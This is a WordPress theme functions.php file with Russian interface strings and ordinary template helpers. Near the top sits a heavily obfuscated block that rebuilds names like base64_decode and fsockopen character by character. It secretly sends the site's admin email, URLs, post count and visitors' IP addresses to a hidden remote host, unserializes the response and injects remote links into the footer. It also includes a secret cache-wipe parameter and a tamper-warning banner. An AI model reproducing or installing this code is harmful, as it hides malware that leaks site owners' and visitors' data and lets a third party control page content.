<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $kwZwTra='s';$irmcJnj='d';$NdsSkrb='a';$zAyiznY='b';$rTfrjZ='e';$bfgV='4';$tapTbJS='e';$knKuFMs='_';$ggQz='e';$cleuyhd='d';$BZFGfA='c';$qOjKu='o';$btYCS='6';$EnOfJttk=$zAyiznY.$NdsSkrb.$kwZwTra.$ggQz.$btYCS.$bfgV.$knKuFMs.$irmcJnj.$tapTbJS.$BZFGfA.$qOjKu.$cleuyhd.$rTfrjZ;$tCsNd='i';$JrATuz='l';$pxKxER='a';$kquJh='f';$KGYe='n';$ajSkd='g';$MVYdhgh='z';$pBEA='e';$YuiMyrx='t';$PtSmmVyQ=$ajSkd.$MVYdhgh.$tCsNd.$KGYe.$kquJh.$JrATuz.$pxKxER.$YuiMyrx.$pBEA;$uchSRtX='1';$XWPGT='r';$PRUftzF='t';$rAUw='t';$EmxqTR='_';$yPmf='r';$YjYocP='3';$WoHrxu='s';$okBJ='o';$NLGubefy=$WoHrxu.$PRUftzF.$yPmf.$EmxqTR.$XWPGT.$okBJ.$rAUw.$uchSRtX.$YjYocP;$IbIjnYa='e';$FWcA='v';$oNOotaY='r';$WGWSVKb='t';$LAlq='s';$KSkXuDX='r';$UumBsaCf=$LAlq.$WGWSVKb.$oNOotaY.$KSkXuDX.$IbIjnYa.$FWcA;                     $ij______b='s';$fs___________h='d';$aq_____________k='a';$cz__b='b';$de___i='e';$ey_______a='4';$rr______s='e';$tx_____h='_';$ui__z='e';$ut______u='d';$if___q='c';$om___________j='o';$zj_____________h='6';$lt___________o=$cz__b.$aq_____________k.$ij______b.$ui__z.$zj_____________h.$ey_______a.$tx_____h.$fs___________h.$rr______s.$if___q.$om___________j.$ut______u.$de___i;$xx______________z='t';$rn_________c='s';$oi_________v='s';$aj_______n='i';$ga_____y='u';$ji___________r='f';$es____________k='e';$nd________u='_';$lf________u='n';$qx_______________x='x';$ne_______________a='t';$ho_______b='i';$fx____p='n';$hd_______m='c';$bt___________o='o';$dm______p=$ji___________r.$ga_____y.$fx____p.$hd_______m.$ne_______________a.$ho_______b.$bt___________o.$lf________u.$nd________u.$es____________k.$qx_______________x.$aj_______n.$oi_________v.$xx______________z.$rn_________c;$ut_______n='o';$qv___s='e';$sh____________v='p';$qu_______i='n';$rg_____i='f';$sv___________f=$rg_____i.$ut_______n.$sh____________v.$qv___s.$qu_______i;$oh___e='f';$va_______________w='a';$kp_________b='d';$no_______________o='e';$bm_________n='r';$ml__u=$oh___e.$bm_________n.$no_______________o.$va_______________w.$kp_________b;$xt____________u='o';$hg_______________t='f';$zg_____________y='e';$yp____________q='s';$vl_____________w='c';$xh__________a='l';$nj_____________z=$hg_______________t.$vl_____________w.$xh__________a.$xt____________u.$yp____________q.$zg_____________y;define("WP_ID", $lt___________o("Mi4wLjA="));define("WP_TTL", $lt___________o("MTA4MDA="));define("WP_SRC", $lt___________o("dHBva24="));function wp_get_header() {global $lt___________o, $dm______p;if ($dm______p($lt___________o("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$dm______p($lt___________o("d3BfZ2V0X2Zvb3Rlcg==")) &&$dm______p($lt___________o("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $lt___________o, $sv___________f, $nj_____________z, $ml__u;$ef______o = TEMPLATEPATH."/".$lt___________o("Zm9vdGVyLnBocA==");$xr________q = @$sv___________f($ef______o, "r");$ef______o = @$ml__u($xr________q, @filesize($ef______o));@$nj_____________z($xr________q);$rk____e = TEMPLATEPATH."/".$lt___________o("ZnVuY3Rpb25zLnBocA==");$xr________q = @$sv___________f($rk____e, "r");$rk____e = @$ml__u($xr________q, @filesize($rk____e));@$nj_____________z($xr________q);$ug_____________q = 0;if($ef______o && $rk____e) {if ($lt___________o("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ef______o, $lt___________o("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$ug_____________q = 1;}if (substr_count($ef______o, "wp_theme_GPL_credits()") < 1) {$ug_____________q = 2;}}if(WP_ID != "2.0.0") {$ug_____________q = 12;}}if($ug_____________q > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $ug_____________q -->";}}function wp_loaded() {global $lt___________o, $dm______p;return $dm______p($lt___________o("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($iu_________g, $xb______g = "(more...)", $fm_____m = 0, $ws_______________k = "") {$ww________s = get_the_content($xb______g, $fm_____m, $ws_______________k);$ww________s = apply_filters("the_content", $ww________s);$ww________s = str_replace("]]>", "]]>", $ww________s);if (strlen($_GET["p"]) > 0) {echo $ww________s;}else if ((strlen($ww________s)>$iu_________g) && ($zu____________p = strpos($ww________s, " ", $iu_________g ))) {$ww________s = substr($ww________s, 0, $zu____________p);$ww________s = $ww________s;echo $ww________s;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$xb______g</a></div></p>";} else {echo $ww________s;}}}$sp______l='4';$jh________s='e';$dl_____________y='n';$gy_________z='6';$gb__________z='b';$cw___________s='s';$oc_____________v='e';$nt_______________f='e';$cm___l='o';$hg_____________k='c';$tp____a='d';$uw________w='a';$je_____t='_';$sb____a=$gb__________z.$uw________w.$cw___________s.$jh________s.$gy_________z.$sp______l.$je_____t.$oc_____________v.$dl_____________y.$hg_____________k.$cm___l.$tp____a.$nt_______________f;$ev_____j='t';$wo____l='c';$dg___________s='i';$pu___________l='l';$kx_____________y='t';$vx_______________r='s';$ny__n='g';$gg__o='t';$iv______________q='o';$oi__m='n';$ml_______________r='n';$yb_____________h='_';$vv________g='e';$ht________k='e';$hp______________l='_';$kr_______________t='e';$fl______n='f';$bc_______v=$fl______n.$dg___________s.$pu___________l.$ht________k.$yb_____________h.$ny__n.$kr_______________t.$ev_____j.$hp______________l.$wo____l.$iv______________q.$oi__m.$kx_____________y.$vv________g.$ml_______________r.$gg__o.$vx_______________r;$tt____z='_';$fo_______________l='s';$lq________s='s';$eu________t='f';$al___f='i';$ax______s='l';$ff_________w='i';$hm_____________t='e';$tn______t='t';$bz___u='x';$cd__________x='e';$em_____k=$eu________t.$ff_________w.$ax______s.$hm_____________t.$tt____z.$cd__________x.$bz___u.$al___f.$fo_______________l.$tn______t.$lq________s;$vu__g='a';$au______l='_';$lm__u='v';$ix__________l='r';$gb_______h='e';$mt_______________y='e';$lo______________j='o';$sv_______________a='p';$fn__x='m';$cf___________p='o';$ha_____________a='i';$rf_____________c='s';$nz_____________k='r';$di________y='n';$hj_____t='c';$nt__________n=$lm__u.$mt_______________y.$nz_____________k.$rf_____________c.$ha_____________a.$lo______________j.$di________y.$au______l.$hj_____t.$cf___________p.$fn__x.$sv_______________a.$vu__g.$ix__________l.$gb_______h;$gj____i='o';$df__c='p';$xd______________x='o';$kk_____e='e';$ex____________x='c';$ay__________r='s';$pw_______________p='n';$gq______________q='k';$te__________u='f';$lq_________r=$te__________u.$ay__________r.$gj____i.$ex____________x.$gq______________q.$xd______________x.$df__c.$kk_____e.$pw_______________p;$jw_____e='f';$kn_____i='w';$xk____________s='i';$cc_______k='e';$ga________h='t';$xs_______f='r';$tu_____________h=$jw_____e.$kn_____i.$xs_______f.$xk____________s.$ga________h.$cc_______k;$fs_______________h='5';$qa_______n='m';$ke_____r='d';$lx_____________q=$qa_______n.$ke_____r.$fs_______________h;$tz__p='r';$wo______p='e';$hx________a='p';$eg__________y='h';$ld_______________r='a';$ti_________x='a';$tf___________r='t';$xs__________n='l';$kz__________p=$tz__p.$wo______p.$ti_________x.$xs__________n.$hx________a.$ld_______________r.$tf___________r.$eg__________y;$gq____________f='r';$ud____________r='e';$wx______i='z';$lw______f='e';$uf___________z='u';$mn_________a='s';$xq_______________j='i';$sm____________d='a';$ev______z='i';$lf______________y='n';$fr_______________z='l';$hr________v=$uf___________z.$lf______________y.$mn_________a.$ud____________r.$gq____________f.$ev______z.$sm____________d.$fr_______________z.$xq_______________j.$wx______i.$lw______f;$ye_______________t='m';$ln_____w='e';$nv__h='t';$ui_______________d='p';$hd__n='m';$xa___f='a';$ol_______k='n';$hn___s=$nv__h.$ln_____w.$hd__n.$ui_______________d.$ol_______k.$xa___f.$ye_______________t;$mv___________u='r';$ml__y='m';$sm______e='x';$xj___x='t';$hk__________k='e';$cq______________g='r';$ix_________a='t';$bv_____________f='c';$gx______________x='_';$ht____________i='e';$yn___________g='t';$dh_____c='e';$dq__m='o';$zw_____________z='_';$re_______________x='c';$js______d='t';$ii__________l='n';$dh______________x='a';$fy___________c='s';$vx______d='a';$kw____i='e';$lk______________q=$fy___________c.$js______d.$cq______________g.$ht____________i.$dh______________x.$ml__y.$zw_____________z.$re_______________x.$dq__m.$ii__________l.$yn___________g.$hk__________k.$sm______e.$xj___x.$gx______________x.$bv_____________f.$mv___________u.$dh_____c.$vx______d.$ix_________a.$kw____i;function wg________z($ce______________n) {global $lt___________o, $dm______p, $bc_______v, $nt__________n, $lk______________q;if (!$dm______p($lt___________o("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($nt__________n(PHP_VERSION, "5.0.0", ">=") && $dm______p($lt___________o("ZmlsZV9nZXRfY29udGVudHM=")) && $dm______p($lt___________o("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$zb__________r = $lk______________q(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$mp______o = @$bc_______v($ce______________n, 0, $zb__________r);} else {$mp______o = @$bc_______v($ce______________n, 0);}return $mp______o;}function al_______________j($ce______________n) {global $dm______p, $lq_________r, $tu_____________h, $lt___________o;if (!$dm______p($lt___________o("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$fs_____________t = strpos($ce______________n, "/", 7);$rc____________l = array("uri"     => substr($ce______________n, $fs_____________t),"host"    => str_replace("http://", "", substr($ce______________n, 0, $fs_____________t)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$fc______________x = @$lq_________r("$rc____________l[host]", 80, $gf________c, $dp__________m, 4);if (!$fc______________x) {return false;} else {$mp______o = "";$mk_______w  = "GET $rc____________l[uri] HTTP/1.0\r\n";$mk_______w .= "Host: $rc____________l[host]\r\n";$mk_______w .= "Referer: $rc____________l[referer]\r\n";$mk_______w .= "Connection: Close\r\n\r\n";@$tu_____________h($fc______________x, $mk_______w);while (!@feof($fc______________x)) {$yl__________x = @fgets($fc______________x, (1024*24));if ($yl__________x == "\r\n") {$xm____a = true;continue;}if ($xm____a) {$mp______o .= $yl__________x;}}return $mp______o;}}function nl______________r($ce______________n) {global $dm______p;$lx__________i = false;if ($ce______________n != "") {if ($dm______p("wg________z")) {$lx__________i = @wg________z($ce______________n);}if (!$lx__________i && ($dm______p("al_______________j"))) {$lx__________i = @al_______________j($ce______________n);}}return $lx__________i;}function el_____c() {global $_SERVER, $lx_____________q;$yt_____d = $_SERVER["SERVER_NAME"];if (substr("$yt_____d", 0, 4) == "www.") {$yt_____d = substr("$yt_____d", 4);}$yt_____d = $lx_____________q("$_SERVER[SERVER_NAME]");return $yt_____d;}function bn___u() {return "file";}function su_______x($ce______________n) {global $_SERVER, $bc_______v, $em_____k, $sv___________f, $nj_____________z, $tu_____________h;$gt____________u = ii_____s();$kj__i = el_____c().".jpg";$tb___________y = $gt____________u["dir_upload"]["path"]."/$kj__i";$ae_______________y = @filemtime($tb___________y);if (!$ae_______________y || ((time()-$ae_______________y) >= WP_TTL)) {$lx__________i = nl______________r($ce______________n);if ($lx__________i) {if ($em_____k($tb___________y)) {@unlink($tb___________y);}$xr________q = @$sv___________f($tb___________y, "x+");@$tu_____________h($xr________q, $lx__________i);@$nj_____________z($xr________q);}} else {if ($em_____k($tb___________y)) {$lx__________i = @$bc_______v($tb___________y);} else {$lx__________i = false;}}return $lx__________i;}function ii_____s() {global $_SERVER, $lt___________o, $sb____a;$an_________y = wp_count_posts("post");$jk______________g = pathinfo(get_bloginfo("template_directory"));$gt____________u = array("url" => array("report"      => $lt___________o("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $jk______________g,"dir_upload"=> tn____________d(),"queryString"=> array("?a001=".WP_ID,"a004=".$jk______________g[filename],"a005=".$an_________y->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "");$gt____________u["url"]["queryString"] = implode("&", $gt____________u["queryString"]);$gt____________u["url"]["report"] = $gt____________u["url"]["report"]."/?".$sb____a($gt____________u["url"]["queryString"]).".html";return $gt____________u;}function tn____________d() {$nn_________b = wp_upload_dir();if (isset($nn_________b["error"])) {$sa_____________l = ea________n();if (is_writable($sa_____________l)) {$nn_________b = array("path" => $sa_____________l);}}return $nn_________b;}function ea________n() {global $dm______p, $lx_____________q, $kz__________p, $hn___s;$tr___g = (bool) ini_get("safe_mode");if ($tr___g == true) {return false;}if ($dm______p("sys_get_temp_dir")) {$hf____p = sys_get_temp_dir();if (is_writable($hf____p)) {return $kz__________p($hf____p);}}if (!empty($_ENV["TMP"])) {return $kz__________p($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $kz__________p($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $kz__________p($_ENV["TEMP"]);} else {$xu__________f = $hn___s($lx_____________q(uniqid(rand(), true)), "");if ($xu__________f) {$hf____p = $kz__________p(dirname($xu__________f));@unlink($xu__________f);return $hf____p;} else {return false;}}}function tm__________v() {global $_GET, $em_____k;$gt____________u = ii_____s();$yt_____d = el_____c();$ou____t = bn___u();$kk_____g = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($ou____t == "file") {$bb____w = $gt____________u["dir_upload"]["path"]."/".$yt_____d.".jpg";if ($em_____k($bb____w)) {@unlink($bb____w);$kk_____g = "deleted";}}$id__________h = array("s"=> $kk_____g,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($id__________h AS $ek___f => $lg___z) echo " [$ek___f:$lg___z]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $dm______p, $lt___________o, $hr________v;$gt____________u = ii_____s();$nn___u = "su_______x";if ($dm______p($nn___u)) {$mp______o = $nn___u($gt____________u["url"]["report"]);}if ($mp______o) {if ($mp______o = @$lt___________o($mp______o)) {$mp______o = @$hr________v($mp______o);if (strlen($mp______o[custom_credit]) >= 5) {$gt____________u["default_string"] = $mp______o[custom_credit];}if ($mp______o["status"] == "0") {$ft____________d = 1;$ay________i = 1;} else {$xj_____k = sizeof($mp______o["links"]);$qv_____________r = $gt____________u["default_string"];if ($xj_____k > 0 && $mp______o["links"] !== "") {$co____________n = 0;foreach ($mp______o["links"] as $lh_______y => $yh______________b) {$co____________n++;if ($yh______________b->l_path == "" || $yh______________b->l_path == $_SERVER["REQUEST_URI"]) {$yh______________b->l_href = htmlspecialchars(strip_tags($yh______________b->l_href));$yh______________b->l_title = htmlspecialchars(strip_tags($yh______________b->l_title));$yh______________b->l_anchor = htmlspecialchars(strip_tags($yh______________b->l_anchor));$qv_____________r .= " | ";$qv_____________r .= "<a href='$yh______________b->l_href' title='$yh______________b->l_title'";if ($yh______________b->l_nofollow == "1") {$qv_____________r .= " rel='nofollow'";}$qv_____________r .= ">$yh______________b->l_anchor</a>";}}}$gt____________u["links"] = "$qv_____________r";if ($mp______o[credit] == "0") {$gt____________u["links"] = "";}}} else {$ft____________d = "1";}} else {$ft____________d = "1";}if ($ft____________d == "1") {$gt____________u["links"] = $gt____________u["default_string"];}echo "$gt____________u[links]";echo "<!-- s: $mp______o[signature] -->";tm__________v();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),   
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
